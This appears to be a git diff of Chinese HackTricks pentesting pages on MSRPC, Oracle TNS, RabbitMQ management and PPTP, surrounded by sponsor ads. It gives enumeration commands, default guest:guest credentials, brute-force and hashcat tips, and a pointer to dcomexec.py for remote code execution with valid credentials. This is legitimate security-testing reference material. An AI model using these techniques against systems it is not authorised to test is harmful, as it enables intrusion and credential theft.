参与深入探讨黑客的刺激挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
通过最新的赏金计划发布和重要平台更新保持信息更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy)立即与顶尖黑客合作!
**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作
## 基本信息
Microsoft 远程过程调用MSRPC协议是一个客户端-服务器模型,使程序能够从位于另一台计算机上的程序请求服务,而无需了解网络的具体细节。该协议最初源自开源软件,后来由 Microsoft 开发并拥有版权。
Microsoft 远程过程调用 (MSRPC) 协议是一种客户端-服务器模型,使程序能够请求位于另一台计算机上的程序提供服务,而无需了解网络的具体情况。该协议最初源于开源软件,后来由 Microsoft 开发并获得版权。
RPC 端点映射器可以通过 TCP 和 UDP 端口 135 访问SMB 可以通过 TCP 139 和 445使用空会话或经过身份验证的会话访问也可以作为 Web 服务在 TCP 端口 593 上访问。
RPC 端点映射器可以通过 TCP 和 UDP 端口 135 访问SMB 在 TCP 139 和 445使用空会话或经过身份验证的会话以及作为 Web 服务在 TCP 端口 593 上访问。
```
135/tcp open msrpc Microsoft Windows RPC
```
## MSRPC是如何工作的
由客户端应用程序发起MSRPC过程涉及调用本地存根过程然后与客户端运行时库交互准备并传输请求到服务器。这包括将参数转换为标准网络数据表示格式。如果服务器是远程的,传输协议的选择由运行时库确定确保RPC通过网络堆栈传递。
由客户端应用程序发起MSRPC过程涉及调用本地存根过程然后与客户端运行时库交互以准备和传输请求到服务器。这包括将参数转换为标准网络数据表示格式。如果服务器是远程的,传输协议的选择由运行时库决定确保RPC通过网络栈传递。
![https://0xffsec.com/handbook/images/msrpc.png](https://0xffsec.com/handbook/images/msrpc.png)
## **识别暴露的RPC服务**
通过查询RPC定位器服务和各个端点可以确定RPC服务在TCP、UDP、HTTP和SMB上的暴露情况。诸如rpcdump之类的工具有助于识别独特的RPC服务由**IFID**值表示,揭示服务详细信息和通信绑定:
通过查询RPC定位服务和各个端点可以确定通过TCP、UDP、HTTP和SMB暴露的RPC服务。工具如rpcdump有助于识别唯一的RPC服务以**IFID**值表示,揭示服务细节和通信绑定:
```
D:\rpctools> rpcdump [-p port] <IP>
**IFID**: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
@ -53,7 +54,7 @@ Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:<IP>[1028]
```
访问RPC定位服务是通过特定协议启用的ncacn_ip_tcp ncadg_ip_udp 用于通过端口 135 访问ncacn_np 用于 SMB 连接ncacn_http 用于基于 Web RPC 通信。以下命令示例展示了利用 Metasploit 模块审计和与 MSRPC 服务交互,主要集中在端口 135
访问RPC定位服务是通过特定协议启用的ncacn\_ip\_tcp和ncadg\_ip\_udp用于通过端口135访问ncacn\_np用于SMB连接以及ncacn\_http用于基于Web的RPC通信。以下命令示例展示了利用Metasploit模块审计和与MSRPC服务交互主要集中在端口135
```bash
use auxiliary/scanner/dcerpc/endpoint_mapper
use auxiliary/scanner/dcerpc/hidden
@ -61,72 +62,87 @@ use auxiliary/scanner/dcerpc/management
use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
rpcdump.py <IP> -p 135
```
除了`tcp_dcerpc_auditor`之外所有选项都是专门设计用于针对端口135上的MSRPC
所有选项除了 `tcp_dcerpc_auditor` 都是专门针对端口 135 上的 MSRPC 进行攻击设计的
#### 显著的RPC接口
#### 知名 RPC 接口
- **IFID**12345778-1234-abcd-ef00-0123456789ab
- **命名管道**`\pipe\lsarpc`
- **描述**LSA接口,用于枚举用户。
- **IFID**3919286a-b10c-11d0-9ba8-00c04fd92ef5
- **命名管道**`\pipe\lsarpc`
- **描述**LSA目录服务DS接口,用于枚举域和信任关系。
- **IFID**12345778-1234-abcd-ef00-0123456789ac
- **命名管道**`\pipe\samr`
- **描述**LSA SAMR接口用于访问公共SAM数据库元素例如用户名并对用户密码进行暴力破解而不受帐户锁定策略的影响
- **IFID**1ff70682-0a51-30e8-076d-740be8cee98b
- **命名管道**`\pipe\atsvc`
- **描述**:任务计划程序,用于远程执行命令。
- **IFID**338cd001-2244-31f1-aaaa-900038001003
- **命名管道**`\pipe\winreg`
- **描述**远程注册表服务,用于访问和修改系统注册表。
- **IFID**367abb81-9844-35f1-ad32-98f038001003
- **命名管道**`\pipe\svcctl`
- **描述**服务控制管理器和服务器服务,用于远程启动和停止服务以及执行命令。
- **IFID**4b324fc8-1670-01d3-1278-5a47bf6ee188
- **命名管道**`\pipe\srvsvc`
- **描述**服务控制管理器和服务器服务,用于远程启动和停止服务以及执行命令。
- **IFID**4d9f4ab8-7d1c-11cf-861e-0020af6e7c57
- **命名管道**`\pipe\epmapper`
- **描述**DCOM接口用于通过WM进行暴力破解密码和信息收集
* **IFID**: 12345778-1234-abcd-ef00-0123456789ab
* **命名管道**: `\pipe\lsarpc`
* **描述**: LSA 接口,用于枚举用户。
* **IFID**: 3919286a-b10c-11d0-9ba8-00c04fd92ef5
* **命名管道**: `\pipe\lsarpc`
* **描述**: LSA 目录服务 (DS) 接口,用于枚举域和信任关系。
* **IFID**: 12345778-1234-abcd-ef00-0123456789ac
* **命名管道**: `\pipe\samr`
* **描述**: LSA SAMR 接口,用于访问公共 SAM 数据库元素(例如,用户名)并强行破解用户密码,无论账户锁定策略如何
* **IFID**: 1ff70682-0a51-30e8-076d-740be8cee98b
* **命名管道**: `\pipe\atsvc`
* **描述**: 任务调度程序,用于远程执行命令。
* **IFID**: 338cd001-2244-31f1-aaaa-900038001003
* **命名管道**: `\pipe\winreg`
* **描述**: 远程注册表服务,用于访问和修改系统注册表。
* **IFID**: 367abb81-9844-35f1-ad32-98f038001003
* **命名管道**: `\pipe\svcctl`
* **描述**: 服务控制管理器和服务器服务,用于远程启动和停止服务以及执行命令。
* **IFID**: 4b324fc8-1670-01d3-1278-5a47bf6ee188
* **命名管道**: `\pipe\srvsvc`
* **描述**: 服务控制管理器和服务器服务,用于远程启动和停止服务以及执行命令。
* **IFID**: 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57
* **命名管道**: `\pipe\epmapper`
* **描述**: DCOM 接口,用于强行破解密码和通过 WM 收集信息
### 识别IP地址
### 识别 IP 地址
使用[https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver),来自[空中客车研究](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/)可以滥用_IOXIDResolver_接口内的_ServerAlive2_方法
使用 [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver),来自 [Airbus research](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/),可以滥用 _**ServerAlive2**_ 方法在 _**IOXIDResolver**_ 接口内。
此方法已用于从HTB盒子_APT_中获取**IPv6**地址的接口信息。查看[这里](https://0xdf.gitlab.io/2021/04/10/htb-apt.html)了解0xdf APT的解析其中包括使用[Impacket](https://github.com/SecureAuthCorp/impacket/)的rpcmap.py和_stringbinding_的替代方法请参见上文)。
该方法已被用于从 HTB 盒子 _APT_ 获取接口信息,如 **IPv6** 地址。有关 0xdf APT 的详细信息,请参见 [这里](https://0xdf.gitlab.io/2021/04/10/htb-apt.html),其中包括使用来自 [Impacket](https://github.com/SecureAuthCorp/impacket/) 的 rpcmap.py 和 _stringbinding_ 的替代方法(见上文)。
### 使用有效凭据执行RCE
### 使用有效凭据执行 RCE
如果具有有效用户的凭据,则可以使用[impacket框架](https://github.com/fortra/impacket/blob/master/examples/dcomexec.py)中的dcomexec.py在计算机上执行远程代码。
如果有有效用户的凭据,可以使用来自 impacket 框架的 [dcomexec.py](https://github.com/fortra/impacket/blob/master/examples/dcomexec.py) 在机器上执行远程代码。
**记得尝试使用不同的可用对象**
**记得尝试不同的可用对象**
- ShellWindows
- ShellBrowserWindow
- MMC20
* ShellWindows
* ShellBrowserWindow
* MMC20
## 端口593
## 端口 593
来自[rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools)的**rpcdump.exe**可以与此端口进行交互。
来自 [rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) **rpcdump.exe** 可以与此端口进行交互。
## 参考资料
## 参考文献
- [https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/)
- [https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/](https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/)
- [https://0xffsec.com/handbook/services/msrpc/](https://0xffsec.com/handbook/services/msrpc/)
* [https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/)
* [https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/](https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/)
* [https://0xffsec.com/handbook/services/msrpc/](https://0xffsec.com/handbook/services/msrpc/)
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客的刺激挑战的内容
参与深入探讨黑客的刺激挑战的内容
**实时黑客新闻**\
通过实时新闻和见解保持与快节奏的黑客世界同步
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
通过最新的赏金计划启动和重要平台更新保持信息更新
及时了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),立即与顶尖黑客合作!
**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作!
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

58
network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md
View file

@ -1,51 +1,49 @@
# 1521,1522-1529 - Pentesting Oracle TNS Listener
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) 上**关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 基本信息
Oracle 数据库Oracle DB是来自 Oracle 公司的关系数据库管理系统RDBMS来自[这里](https://www.techopedia.com/definition/8711/oracle-database))。
在枚举 Oracle 时,第一步是与通常位于默认端口上的 TNS-Listener 进行通信1521/TCP-您也可能在 15221529 上获得辅助监听器-)。
Oracle 数据库 (Oracle DB) 是甲骨文公司 (来自 [这里](https://www.techopedia.com/definition/8711/oracle-database)) 的关系数据库管理系统 (RDBMS)。
在枚举 Oracle 时,第一步是与通常位于默认端口 (1521/TCP-您也可能会在 15221529 上获得次级监听器-) 的 TNS-Listener 进行通信。
```
1521/tcp open oracle-tns Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows)
1748/tcp open oracle-tns Oracle TNS Listener
```
## 摘要
1. **版本枚举**识别版本信息以搜索已知漏洞。
2. **TNS Listener暴力破解**有时需要建立通信。
3. **SID名称枚举/暴力破解**发现数据库名称SID
4. **凭证暴力破解**:尝试访问已发现的SID。
5. **代码执行**尝试在系统上运行代码。
1. **版本枚举**: 识别版本信息以搜索已知漏洞。
2. **TNS 监听器暴力破解**: 有时需要建立通信。
3. **SID 名称枚举/暴力破解**: 发现数据库名称 (SID)
4. **凭证暴力破解**: 尝试访问发现的 SID。
5. **代码执行**: 尝试在系统上运行代码。
要使用MSF oracle模块您需要安装一些依赖项[**安装**](https://github.com/carlospolop/hacktricks/blob/cn/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md)
为了使用 MSF oracle 模块,您需要安装一些依赖项: [**安装**](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md)
## 帖子
## 文章
查看这些帖子:
查看这些文章:
* [https://secybr.com/posts/oracle-pentesting-best-practices/](https://secybr.com/posts/oracle-pentesting-best-practices/)
* [https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573](https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573)
* [https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/](https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/)
* [http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html](http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html)
## HackTricks自动命令
## HackTricks 自动命令
```
Protocol_Name: Oracle #Protocol Abbreviation if there is one.
Port_Number: 1521 #Comma separated if there is more than one.
@ -73,17 +71,17 @@ Name: Nmap
Description: Nmap with Oracle Scripts
Command: nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP}
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

54
network-services-pentesting/15672-pentesting-rabbitmq-management.md
View file

@ -1,49 +1,50 @@
# 15672 - RabbitMQ管理渗透测试
# 15672 - Pentesting RabbitMQ Management
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**漏洞赏金提示****注册**Intigriti这是一家由黑客创建的高级**漏洞赏金平台**!立即加入我们,访问[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
## 基本信息
您可以在[**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md)中了解有关RabbitMQ的更多信息。\
在此端口上,如果启用了[管理插件](https://www.rabbitmq.com/management.html)您可能会找到RabbitMQ管理Web控制台。\
主页应该如下所示
您可以在 [**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md) 中了解更多关于 RabbitMQ 的信息。\
在此端口,如果启用了 [管理插件](https://www.rabbitmq.com/management.html),您可能会找到 RabbitMQ 管理网页控制台。\
主页应该看起来像这样
![](<../.gitbook/assets/image (336).png>)
## 枚举
默认凭据为"_**guest**_":"_**guest**_"。如果不起作用,您可以尝试[**暴力破解登录**](../generic-methodologies-and-resources/brute-force.md#http-post-form)。
默认凭据是 "_**guest**_":"_**guest**_"。如果它们无法使用,您可以尝试 [**暴力破解登录**](../generic-methodologies-and-resources/brute-force.md#http-post-form)。
要手动启动此模块,您需要执行:
```
rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart
```
一旦您正确进行了身份验证,您将看到管理控制台:
一旦您正确证,您将看到管理控制台:
![](<../.gitbook/assets/image (441).png>)
此外,如果您拥有有效凭据,您可能会发现`http://localhost:15672/api/connections`的信息很有趣。
此外,如果您拥有有效凭据,您可能会发现 `http://localhost:15672/api/connections` 的信息很有趣。
还要注意,可以使用类似以下请求的服务API**在队列内发布数据**
还要注意,可以使用此服务的 API 通过以下请求**在队列中发布数据**
```bash
POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
@ -65,20 +66,21 @@ hashcat -m 1420 --hex-salt hash.txt wordlist
<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**漏洞赏金提示**: **注册**Intigriti这是一个由黑客创建的高级**漏洞赏金平台**!立即加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
**漏洞赏金提示**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式:
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

42
network-services-pentesting/1723-pentesting-pptp.md
View file

@ -1,26 +1,27 @@
# 1723 - 渗透测试 PPTP
# 1723 - Pentesting PPTP
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持 HackTricks 的其他方式:
- 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
- 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
- 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **侵害**
WhiteIntel 的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -30,7 +31,7 @@ WhiteIntel 的主要目标是打击由窃取信息恶意软件导致的账户劫
## 基本信息
**点对点隧道协议PPTP** 是一种广泛用于**远程访问**移动设备的方法。它利用 **TCP 端口 1723** 用于密钥交换,而 **IP 协议 47**(通用路由封装,或**GRE**)用于加密对等方之间传输的数据。这种设置对于在互联网上建立安全通信通道至关重要,确保交换的数据保持机密并受到未授权访问保护。
**点对点隧道协议 (PPTP)** 是一种广泛用于 **远程访问** 移动设备的方法。它利用 **TCP 端口 1723** 进行密钥交换,而 **IP 协议 47**(通用路由封装,或 **GRE**)用于加密在对等方之间传输的数据。此设置对于在互联网上建立安全通信通道至关重要,确保交换的数据保持机密并受到未授权访问保护。
**默认端口**1723
@ -45,16 +46,17 @@ nmap Pn -sSV -p1723 <IP>
* [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/)
* [https://github.com/moxie0/chapcrack](https://github.com/moxie0/chapcrack)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
